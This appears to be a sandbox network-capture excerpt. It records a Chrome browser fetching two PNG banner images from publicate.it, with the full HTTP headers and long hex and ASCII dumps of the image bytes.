                                                                                                                                                                                                        2024-08-30 16:16:19 UTC833INData Raw: 31 20 31 2e 35 32 34 2d 31 2e 32 34 37 20 36 2e 38 39 38 20 36 2e 38 39 38 20 30 20 30 20 31 20 31 2e 39 38 32 2d 2e 36 33 63 2e 37 31 2d 2e 31 31 35 20 31 2e 33 36 33 2d 2e 31 38 39 20 31 2e 39 35 37 2d 2e 32 32 32 2e 31 39 39 2d 2e 30 31 36 2e 33 39 32 2d 2e 30 32 35 2e 35 38 33 2d 2e 30 32 35 68 2e 35 33 32 76 2d 2e 34 35 63 30 2d 2e 36 33 36 2d 2e 31 37 2d 31 2e 30 38 37 2d 2e 35 30 38 2d 31 2e 33 35 34 2d 2e 33 33 39 2d 2e 32 36 37 2d 2e 38 38 38 2d 2e 34 2d 31 2e 36 34 37 2d 2e 34 2d 2e 37 31 20 30 2d 31 2e 33 34 32 2e 31 31 35 2d 31 2e 38 39 36 2e 33 34 36 2d 2e 35 35 33 2e 32 33 31 2d 31 2e 30 39 34 2e 34 39 35 2d 31 2e 36 32 33 2e 37 39 33 61 33 2e 36 33 38 20 33 2e 36 33 38 20 30 20 30 20 31 2d 2e 35 35 37 2d 2e 39 33 63 2d 2e 31 34 2d 2e 33 33
                                                                                                                                                                                                        Data Ascii: 1 1.524-1.247 6.898 6.898 0 0 1 1.982-.63c.71-.115 1.363-.189 1.957-.222.199-.016.392-.025.583-.025h.532v-.45c0-.636-.17-1.087-.508-1.354-.339-.267-.888-.4-1.647-.4-.71 0-1.342.115-1.896.346-.553.231-1.094.495-1.623.793a3.638 3.638 0 0 1-.557-.93c-.14-.33


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        46192.168.2.549791104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC779OUTGET /images/home_banner.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC753INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:19 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 717659
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "af35b-620aa1d243e2f"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YEtHKrVrBvNHghOCjFGjIbCUqoqOJGN%2FlRbbsixqvMuEuwlCFOI%2FaPqX2sTbvt3Vh9f9ZjrsP%2F4kayP1Q1hUYEkNqY%2BqybG7QZvftVDc0hpqYpMCzAQx6nM98L%2FhHg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615aa5a70334e-EWR
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC616INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 ac 00 00 05 04 08 06 00 00 00 30 11 57 be 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 38 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 01 87 69 00 04 00 00 00 01 00 00 00 1a 00 00 00 00 00 02 a0 02 00 04 00 00 00 01 00 00 05 ac a0 03 00 04 00 00 00 01 00 00 05 04 00 00 00 00 20 ac 9a e0 00 00 40 00 49 44 41 54 78 01 ec dd 09 94 25 79 5d e0 fb 7f c4 dd f2 e6 52 59 7b 55 d7 d6 55 dd 55 dd 0d 0d 4d 77 75 01 a2 b2 39 22 0c 03 6e 07 41 1c 1d cf 7b cf 91 79 33 2e a0 e8 71 de 7b 73 c6 39 47 71 46 1b 65 75 7d e8 73 41 59 54 46 76 15 45 69 70 68 a8 ae 5e e8 86 86 5e aa 6b df 97 dc 6f de 25 e2 fd 7e f7 66 64 46 46 c5 bd 37 ee 1e 71 ef 37 20 2a 22 fe f1 5f 3f 51 9d 75 f3 97 ff fc 87 65 d8 10 40 00 01 04
                                                                                                                                                                                                        Data Ascii: PNGIHDR0WgAMAa8eXIfMM*i @IDATx%y]RY{UUUMwu9"nA{y3.q{s9GqFeu}sAYTFvEiph^^ko%~fdFF7q7 *"_?Que@
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: e2 f4 34 e8 0b 02 08 c4 49 80 c0 75 9c 9e 06 7d 41 00 81 44 0a f0 41 33 91 8f 8d 4e 23 80 00 02 08 20 80 00 02 08 20 30 10 01 be 7f 18 08 3b 8d 22 80 40 02 05 08 5c 27 f0 a1 d1 65 04 10 88 87 00 1f 38 e3 f1 1c e8 05 02 08 20 80 00 02 08 20 80 00 02 71 17 48 e2 f7 0e 49 ec 73 dc ff 1e d0 3f 04 06 25 90 c4 00 70 12 fb 3c a8 e7 4b bb 08 20 80 c0 aa 00 1f e0 56 29 38 41 00 01 04 10 40 00 01 04 10 40 00 81 10 81 b8 7f cf 10 f7 fe 85 90 92 84 00 02 5d 16 88 7b 60 38 ee fd eb f2 e3 a0 3a 04 10 40 a0 33 01 3e dc 75 e6 47 69 04 10 40 00 01 04 10 40 00 01 04 86 59 20 6e df 2f c4 ad 3f c3 fc ec 19 1b 02 49 17 88 5b 90 38 6e fd 49 fa f3 a5 ff 08 20 30 c4 02 7c e0 1b e2 87 cb d0 10 40 00 01 04 10 40 00 01 04 10 e8 40 20 0e df 2b c4 a1 0f 1d 10 52 14 01 04 62 24 10 87
                                                                                                                                                                                                        Data Ascii: 4Iu}ADA3N# 0;"@\'e8 qHIs?%p<K V)8A@@]{`8:@3>uGi@@Y n/?I[8nI 0|@@@ +Rb$
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 01 04 06 26 d0 ad cf fe cd ea a9 77 3f 2c 3d 6a 9a 87 16 96 df bb e7 1d a3 e4 f1 f2 72 44 00 81 64 0a 44 09 e4 d6 cb d3 4a 7a 2b 79 3d c9 7a 65 bc fb ad 1c bb 59 57 2b ed 92 17 01 04 10 18 a8 00 1f e6 06 ca 4f e3 08 20 80 00 02 08 20 80 00 02 08 f4 45 a0 5b 9f fb 9b d5 13 76 3f 6a 9a 42 b4 92 d7 83 0b 2b e3 dd 6b e7 d8 ed fa da e9 03 65 10 18 76 81 6e 07 62 1b d5 57 ef 5e 58 7a d4 34 7d 3e 61 79 bd e7 d6 e8 9e 97 27 ca b1 5b f5 44 69 8b 3c 08 20 80 40 6c 04 f8 30 16 9b 47 41 47 10 40 00 01 04 10 40 00 01 04 10 e8 99 40 b7 3e f7 37 aa 27 ec 5e b7 d3 3c a0 b0 7a bd 7b fe 63 d4 7c fe 32 9c 23 80 40 3c 05 a2 06 6f eb e5 6b 25 3d 98 37 78 ed 09 d5 4b d7 fb 8d ee 79 e5 a3 1c bb 55 4f 94 b6 c8 83 00 02 08 c4 42 80 0f 70 b1 78 0c 74 02 01 04 10 40 00 01 04 10 40
                                                                                                                                                                                                        Data Ascii: &w?,=jrDdDJz+y=zeYW+O E[v?jB+kevnbW^Xz4}>ay'[Di< @l0GAG@@@>7'^<z{c|2#@<ok%=7xKyUOBpxt@@
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 79 bc 3a 34 dd db bd 34 8e 08 20 30 fc 02 de 7f f7 8d be 36 04 15 82 79 fd d7 f5 ce 83 75 f8 af fd 65 fc e9 de 79 b3 fb 5e 3e 8e 08 20 80 00 02 3e 01 be 78 fa 30 38 45 00 01 04 10 40 00 01 04 10 40 60 88 04 da f9 ac 5f af 4c 30 dd 7f ed 3f 57 3e ff 75 ab e7 c1 f2 61 d7 9a a6 9b bf ee 5a 4a 6b 7f 76 5a be b5 d6 c8 8d 00 02 51 04 3a 9d 41 5c af 7c 30 bd d1 b5 ff 5e ab e7 3a 46 7f 99 b0 6b cf 21 98 cf 4b 6f 74 6c a7 4c a3 fa b8 87 00 02 08 c4 52 80 0f 69 b1 7c 2c 74 0a 01 04 10 40 00 01 04 10 40 00 81 8e 04 da fd 9c 1f 56 2e 98 d6 e8 da 7f af d5 73 1d b0 bf 4c d8 75 bd 34 4d 0f 6e c1 ba 82 f7 b9 46 00 81 64 09 b4 12 ac 0d cb 1b 4c 6b 74 ed bf d7 c9 b9 0a fb cb fb c5 eb a5 fb f3 04 cf db 29 13 ac 83 6b 04 10 40 20 f6 02 2c 09 12 fb 47 44 07 11 40 00 01 04 10
                                                                                                                                                                                                        Data Ascii: y:44 06yuey^> >x08E@@`_L0?W>uaZJkvZQ:A\|0^:Fk!KotlLRi|,t@@V.sLu4MnFdLkt)k@ ,GD@
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 2d 1d 40 00 81 d8 09 48 40 db 29 97 cb 8f 16 0a 4b f7 9f 3e 79 f2 93 47 ee 7e fe 03 03 e8 64 bd 80 75 30 dd 7f dd ec 3c ec 7e b3 34 1d 7a 58 1e 3f 89 ff be 3f 3d ec bc 95 bc 61 e5 49 43 00 01 04 62 2f b0 fa e1 33 f6 3d a5 83 08 20 80 00 02 08 20 80 00 02 08 20 10 45 a0 95 cf f8 61 79 83 69 d6 85 eb f3 af c8 e7 c7 fe 9d 65 d9 3f 60 5c 77 32 4a 27 c8 83 00 02 08 78 02 8e e3 1e 5f 58 98 ff f0 17 bf f8 4f 7f fa c6 ef ff fe 33 5e 7a 1f 8e 61 c1 dd 60 9a ff ba d9 79 d8 fd b0 34 1d 5a bd f4 e0 3d 8f c1 9f df 4b 0b 3b 46 cd 17 56 96 34 04 10 40 20 11 02 c1 0f a3 89 e8 34 9d 44 00 01 04 10 40 00 01 04 10 40 00 81 ba 02 ad 7c c6 0f cb 5b 4d 7b c5 2b 5e 61 7d ec d3 7f fb fa 54 2a f5 7f 59 c6 3a 52 b7 35 6e 20 80 00 02 11 05 64 e6 75 69 69 69 f1 c3 5f fd ca ff fa cd
                                                                                                                                                                                                        Data Ascii: -@H@)K>yG~du0<~4zX??=aICb/3= Eayie?`\w2J'x_XO3^za`y4Z=K;FV4@ 4D@@|[M{+^a}T*Y:R5n duiii_
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 57 fc e5 c3 ae eb a5 69 7a 70 0b d6 15 bc cf 35 02 08 20 90 68 81 ba 1f 66 13 3d 2a 3a 8f 00 02 08 20 80 00 02 08 20 80 c0 e8 0a d4 fd 8c 3f bf 5c 79 87 44 39 7e a9 1d 9a a2 cc 9e 5c 5a 5a 30 b6 65 9b 8d 53 93 32 9b ba b3 99 93 ed f4 81 32 08 20 90 1c 01 9d 79 3d bb 58 30 73 f3 0b d5 e5 42 c6 c7 27 64 e9 10 59 2a a8 c5 4d 82 d6 cb 0f 3f f4 d0 ab be f3 c5 f7 3e da 62 51 7f f6 b0 00 6f 30 cd 7f 1d 76 de 49 9a f6 c5 5f 3e ec ba 5e 9a a6 07 b7 60 5d c1 fb 5c 23 80 00 02 89 16 48 25 ba f7 74 1e 01 04 10 40 00 01 04 10 40 00 01 04 82 02 a1 01 eb 99 42 f9 35 b6 6d ff b6 64 0e bd 1f ac c4 bb d6 a0 d3 fc fc 9c ac 51 bd 6c 36 4e 4e 9a cd d3 93 26 23 2f 5a 63 43 00 01 04 1a 09 e8 8b 19 c7 64 4d eb c9 89 bc 29 c9 3a d7 fa 75 44 d7 b5 d7 b5 ae 5b dc d2 db b7 ef 78 79
                                                                                                                                                                                                        Data Ascii: Wizp5 hf=*: ?\yD9~\ZZ0eS22 y=X0sB'dY*M?>bQo0vI_>^`]\#H%t@@B5mdQl6NN&#/ZcCdM):uD[xy
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: f9 35 7c fd 75 7c 36 04 10 40 60 d0 02 9b 36 4c 98 a2 fc d6 47 d4 59 d6 db b6 6e 63 1d eb 41 3f 34 da 47 00 01 04 7a 20 40 c0 ba 07 a8 54 89 00 02 08 20 80 00 02 08 20 80 c0 a0 04 66 0b 85 db 5c e3 ee 8e d2 fe f2 f2 b2 99 1c cf 47 c9 4a 1e 04 10 40 a0 e7 02 29 79 01 63 2e 97 35 25 09 5a 47 d9 f2 f9 fc cb a2 e4 6b 23 0f 0b fa b7 81 46 11 04 10 40 a0 5b 02 04 ac bb 25 49 3d 08 20 80 00 02 08 20 80 00 02 08 c4 40 c0 75 d3 2f 8a d2 8d 4a a5 62 1c c7 31 e3 cc ae 8e c2 45 1e 04 10 e8 93 c0 44 3e 2f 6b eb 2f 47 6a 2d 9d 4e bf e0 ce 3b ef 4c 45 ca 4c 26 04 10 40 00 81 c4 08 10 b0 4e cc a3 a2 a3 08 20 80 00 02 08 20 80 00 02 08 34 17 b0 6d eb b6 e6 b9 8c 29 15 8b d5 99 8c 96 c5 44 c2 28 5e e4 41 00 81 fe 08 e8 0f d1 aa 3f 50 8b f0 f2 45 d7 75 33 bf f1 ae 77 dd dc
                                                                                                                                                                                                        Data Ascii: 5|u|6@`6LGYncA?4Gz @T f\GJ@)yc.5%ZGk#F@[%I= @u/Jb1ED>/k/Gj-N;LEL&@N 4m)D(^A?PEu3w
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 00 01 04 10 48 a8 80 3f 48 dd ab 60 b5 06 a9 0b 85 42 cb 33 aa c3 48 b5 bf 5e d0 5b ef 6b 20 5c 83 d8 b9 5c ae 67 c1 f6 b0 7e 90 86 00 02 08 20 80 00 02 f1 16 60 49 90 78 3f 1f 7a 87 00 02 08 20 80 00 02 08 20 80 00 02 08 84 0a f4 2a 48 ed 35 a6 01 e6 62 b1 d8 95 60 b5 57 a7 ff a8 f5 7b 2f 64 f4 a7 73 8e 00 02 08 20 80 00 02 a3 2d 40 c0 7a b4 9f 3f a3 47 00 01 04 10 40 00 01 04 10 40 00 81 21 10 d0 e0 6f b7 37 9d 01 ed 9f 11 5d af fe 4e da d6 a0 bb ce b2 66 43 00 01 04 10 40 00 01 04 3c 01 02 d6 9e 04 47 04 10 40 00 01 04 10 40 00 01 04 10 40 20 a1 02 bd 98 6d 1d 35 10 1d a5 ed 46 75 69 60 bc d1 fd 84 3e 12 ba 8d 00 02 08 20 80 00 02 6d 0a 10 b0 6e 13 8e 62 08 20 80 00 02 08 20 80 00 02 08 20 80 00 02 d1 04 1a 05 b5 6d db 66 0d eb 68 8c e4 42 00 01 04 10
                                                                                                                                                                                                        Data Ascii: H?H`B3H^[k \\g~ `Ix?z *H5b`W{/ds -@z?G@@!o7]NfC@<G@@@ m5Fui`> mnb mfhB
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 04 d6 02 c6 b5 75 a2 7b da 75 3b 63 52 53 fb 8c 5b 78 be 31 85 d3 b2 be c7 bc 59 2a db a6 2c 01 ea 2b 73 ae f9 da e9 b2 c9 66 2c 93 92 4e 8c cb 7a d5 07 77 a4 4c 5e 8e 19 49 c8 e9 1f 13 7b 8c bd ed e5 c6 ca 6f 23 58 dd d3 07 45 e5 08 20 80 00 02 08 24 5b 80 80 75 b2 9f 1f bd 47 00 01 04 10 40 00 01 04 10 40 00 01 04 56 67 3a f7 9c c2 92 6f 21 37 dc 63 dc b9 af 9b ca cc 63 e6 c1 67 ca e6 c9 f3 8e 39 fa b4 6b 9e 38 eb 98 c9 31 ed 81 2c fd 21 b3 a7 5f 78 c0 31 77 ee b3 cd f3 f7 59 e6 e0 ae 71 89 62 1f 34 76 7e 17 c1 ea 9e 3f 24 1a 40 00 01 04 10 40 20 d9 02 04 ac 93 fd fc e8 3d 02 08 20 80 00 02 08 20 80 00 02 08 20 d0 73 81 75 4b 8f 64 37 49 f0 f9 56 63 cd 3d 6d f2 d9 05 73 75 ce 98 ed b2 c2 c7 6d 37 a5 cc a1 5d 96 b1 64 a5 8f 63 cf 38 c6 91 55 40 ae 2f 38
                                                                                                                                                                                                        Data Ascii: u{u;cRS[x1Y*,+sf,NzwL^I{o#XE $[uG@@Vg:o!7ccg9k81,!_x1wYqb4v~?$@@ = suKd7IVc=msum7]dc8U@/8
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 36 4c 1a db 0e 0b 71 87 14 27 09 01 04 10 40 00 01 04 86 4a 80 1f 5b 0f d5 e3 64 30 08 20 80 00 02 08 20 80 00 02 08 20 30 4a 02 dd 0a 56 ab 99 ae 55 5d 2c 16 5b e7 93 a8 74 41 ca ce 2d 14 24 68 5d 0b 54 7b ab 7a 58 12 88 f6 ce 6b 8b 82 84 55 5f 9b ab 2d 39 a5 fd b2 b9 70 65 d6 cc 2f 15 64 09 11 6f 0e 77 58 19 d2 10 40 00 01 04 10 40 60 58 05 08 58 0f eb 93 65 5c 08 20 80 00 02 08 20 80 00 02 08 20 30 32 02 61 cb 77 b4 32 78 5d ab 5a 97 02 69 77 cb c9 b2 20 f9 7c d6 a4 64 52 f4 fa be f8 67 59 eb 79 78 10 da 95 75 ae ab 9b 04 b8 4b c5 8a 99 99 95 97 38 ca 1a d7 6c 08 20 80 00 02 08 20 30 7a 02 04 ac 47 ef 99 33 62 04 10 40 00 01 04 10 40 00 01 04 10 18 32 81 4e 67 5a eb ec ea 7a c1 e4 28 54 3a 8b da d6 25 40 42 56 f1 58 9b 61 5d 6f 99 90 5a a1 5a 3e 39 97
                                                                                                                                                                                                        Data Ascii: 6Lq'@J[d0 0JVU],[tA-$h]T{zXkU_-9pe/dowX@@`XXe\ 02aw2x]Ziw |dRgYyxuK8l 0zG3b@@2NgZz(T:%@BVXa]oZZ>9


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        47192.168.2.549793104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC785OUTGET /images/home_banner-p-500.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC745INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:19 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 31919
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "7caf-620aa1d1f6bca"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NBssGDhPPV0o3wHVYyJevBCXZxsJ2KgXLVn7LVG0Lr33o3mr6Y9ZIf18g%2Bb8E0x0ce3swy29DwMioCnYvEOyUvKMKn6Mh6vXoZ94FdKWP%2Fs58B9cZtlvjIkiwfgZhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615aa59de1851-EWR
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC624INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 01 ba 08 03 00 00 00 c9 5a 44 a4 00 00 03 00 50 4c 54 45 4c 69 71 2e 2f 2f df eb f3 e5 ec f1 01 01 01 f2 f8 fc f0 f7 fb 01 01 01 06 06 06 07 07 07 e0 e6 eb 3c 3e 3f e9 ef f2 ce d6 dd ba c3 c8 f4 f9 fe f3 f8 fc f4 f9 fd 80 83 85 f3 f9 fd d8 e7 f3 ff ff ff f3 f4 f4 cc e3 f4 f1 f2 f3 cd e4 f5 d4 e6 f3 fe ff ff f9 fa fb ce e4 f5 cd e4 f5 f0 f2 f3 f3 f7 fa bb d0 e0 be d4 e4 e4 ea ee 87 97 b0 e2 ef f9 ff ff ff fe fe fe 00 78 d4 f4 fa fe e5 ea ed e3 e8 ec f5 ef eb fe fe fd f6 f7 f8 f3 f5 f7 fa fb fc f2 f9 fd ef f3 f5 f8 f9 fa fc fd fd f3 ed ea e9 ee f0 e9 e5 e9 e3 de e2 e6 e1 e5 d4 d1 d3 ea e8 eb 01 6f d1 04 08 09 f0 eb e7 03 7a d4 d7 d4 d7 ff ff fe d2 cd ce db d8 da db d5 d1 70 ba ba fe c8 94 34
                                                                                                                                                                                                        Data Ascii: PNGIHDRZDPLTELiq.//<>?xozp4
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: b3 9d a4 aa 8f c3 b9 b1 8a 93 74 f5 d4 6c aa bf d5 fc b8 50 94 9e ae 6c 74 4c 56 72 8d bd bd a7 50 5d 2f ed d9 a3 09 8b 8e 72 88 a1 15 82 d5 08 62 ac f1 bd 72 f7 5a 88 b7 74 5d 79 83 69 f7 7d 9c c6 1e 1b 67 7d 98 d4 9e 56 1c 90 dd d8 c4 86 35 54 6e eb b0 bd 11 72 c1 ec a4 3a b8 93 1a 1b 43 52 86 9d b2 cd a3 36 b2 aa 6b 74 74 27 8a 8f 44 a6 9f 4b 9a ba c9 04 65 6e ee 99 ac d5 b9 62 6f 7d e2 92 aa ba 1f c7 fc e6 13 62 50 da fe eb 4d 42 43 b9 f0 54 b8 70 59 8e 88 71 a0 9b 9e 13 45 4f 60 dd 46 9d 9a 33 e4 f1 f1 70 60 08 87 e6 a2 4b 81 08 a2 37 b2 4d 0c 56 31 c8 08 00 00 00 26 74 52 4e 53 00 12 05 4e 0a fd fd 0d 02 06 71 0e 89 49 29 96 ef d9 1d f6 31 c3 d1 b4 a9 a1 63 bb e0 86 c2 9d b5 82 a5 db d6 bc dd 19 e9 a3 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13
                                                                                                                                                                                                        Data Ascii: tlPltLVrP]/rbrZt]yi}g}V5Tnr:CR6ktt'DKenbo}bPMBCTpYqEO`F3p`K7MV1&tRNSNqI)1cpHYs
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: f8 da 8d ef 6d a2 2e 3a f4 20 bf ad 0e 39 41 0e 41 41 39 5b 19 41 0c 87 20 06 16 74 c2 35 c7 35 c8 81 91 e3 b7 f4 4e a7 9a 22 e5 59 0a ad db b8 61 9a 57 b2 76 c3 46 ea e2 42 67 62 41 85 d0 4f cb 71 82 6f 27 72 82 82 82 b0 a0 20 f8 11 94 13 94 b3 84 d0 75 69 53 ed 57 6c 32 7e e2 b3 a8 da f4 de e6 69 c9 52 57 2c 3e f4 9c 40 20 ec 10 b4 35 28 27 c7 2f d0 21 08 43 cc d1 d7 52 40 9f 44 7b cd 8f de 79 f7 dd 37 de 7d dd 78 09 cf 12 88 ba f9 bd b5 a6 7f 10 ca ec c3 bb 93 8b 2b c3 89 e1 ea c0 70 64 38 3a 38 39 39 3a 61 0c 3f 27 27 27 07 86 6b 61 d0 a2 42 d7 a5 bd ce 7e c5 6b 3f 7a e7 8d b7 e0 e1 99 ef ae 7f 03 fb 11 ec a0 63 b1 da bc 61 11 8e 59 ea 9c b2 f7 69 fe e2 e4 00 0b 20 17 01 fa 54 da ef be a5 be 7f 97 77 d7 bf b3 fe 2d cc d9 a2 8d 4e b1 a7 2e c2 31 4b 9d
                                                                                                                                                                                                        Data Ascii: m.: 9AAA9[A t55N"YaWvFBgbAOqo'r uiSWl2~iRW,>@ 5('/!CR@D{y7}x+pd8:899:a?'''kaB~k?zcaYi Tw-N.1K
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 73 93 3d 18 65 fa 44 8e 4c c9 17 ce 7c 66 a7 53 ec 28 6b 27 07 a0 97 cd e8 14 ca a6 45 5c d7 44 35 94 c8 69 60 69 be 99 d6 e9 f6 2f 66 4e 5d de 46 87 17 b8 78 83 2e d4 c9 89 9c 51 bb 6a b3 71 ba 1d 85 ba 61 b3 c9 77 dc 78 29 b5 76 d3 9c c3 fb 36 a3 1d 02 2f 80 be 69 9a bd d3 74 46 1c 67 73 5c 58 a5 0f 96 b2 e9 bd 59 43 df 4e 72 5e 38 6d cd 3d 6c 9f 31 bc af 7b 6f 9a d9 cb d4 8d 9a 2e 09 75 93 d5 e8 53 34 73 f9 79 dd f4 3b c5 53 0d 42 d7 e9 a3 6b c9 2d 00 ff 8c d0 a7 af 2b d9 2f c2 96 99 16 ac 8d 33 25 fc 6b 37 cc b0 c5 2c 65 2a 74 a2 74 ae f6 bc 0e ec c9 89 de 6c bd 3e 53 78 87 29 62 a6 da 45 69 79 6b dd 4c 93 ac a8 50 ed 99 ee 8d a5 4e 53 86 55 b3 d5 b7 fa 5c dd 4e f6 f7 5f d0 65 9b 5e f6 cb bc 9f 36 59 2b 36 19 6d b8 65 e6 eb 56 e8 15 67 c8 7a 9c 4e bb
                                                                                                                                                                                                        Data Ascii: s=eDL|fS(k'E\D5i`i/fN]Fx.Qjqawx)v6/itFgs\XYCNr^8m=l1{o.uS4sy;SBk-+/3%k7,e*ttl>Sx)bEiykLPNSU\N_e^6Y+6meVgzN
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: c7 a9 4b ad 53 b6 0f 14 2b 95 2d ca 81 81 56 a5 72 40 19 06 66 26 62 3f 47 5e 97 aa cc 2d 6d 1f 28 1d e8 4a 95 0f b4 2b db b6 c1 ff 5b a1 9b 33 f4 a8 30 5e 1d a7 ae 3d 75 a0 b8 b5 b5 ab a5 b9 bd a5 8e c7 23 91 aa 13 35 b9 b4 a5 a5 5d 55 dc da d5 da 5a a6 4c ad 2c ee 0a 53 c7 02 04 5d da d6 5a da 3c d0 ae 6c 55 76 b5 94 b6 ca 39 2d 75 56 a7 9b 33 f4 10 44 15 72 77 65 8b b2 0e d9 bd b5 4e 4e 42 27 bb 6b 1c b9 9c d3 d6 d2 ae 6a 6d 6d 6d 29 55 b5 b4 ab 06 5a ea 38 1a a7 87 71 a4 52 4e 9d b2 ac 52 d5 c5 51 2a 07 5a a4 ec 81 01 48 df e7 ec 74 dd cd 40 ad d2 7f 6b ec 8d 0c 3d 2a 2c 8c 27 ef 52 b6 b4 0f 28 05 28 72 b7 70 ba ba 88 fc 5d ed 65 b9 bc ae 2e b5 b5 74 a0 45 d9 ae ea 92 9e 51 a9 94 3a d0 79 9c d4 ae ae d4 ae 76 49 59 7b 8b b2 b5 a5 45 10 5f dc 32 e7 36
                                                                                                                                                                                                        Data Ascii: KS+-Vr@f&b?G^-m(J+[30^=u#5]UZL,S]Z<lUv9-uV3DrweNNB'kjmmm)UZ8qRNRQ*ZHt@k=*,'R((rp]e.tEQ:yvIY{E_26
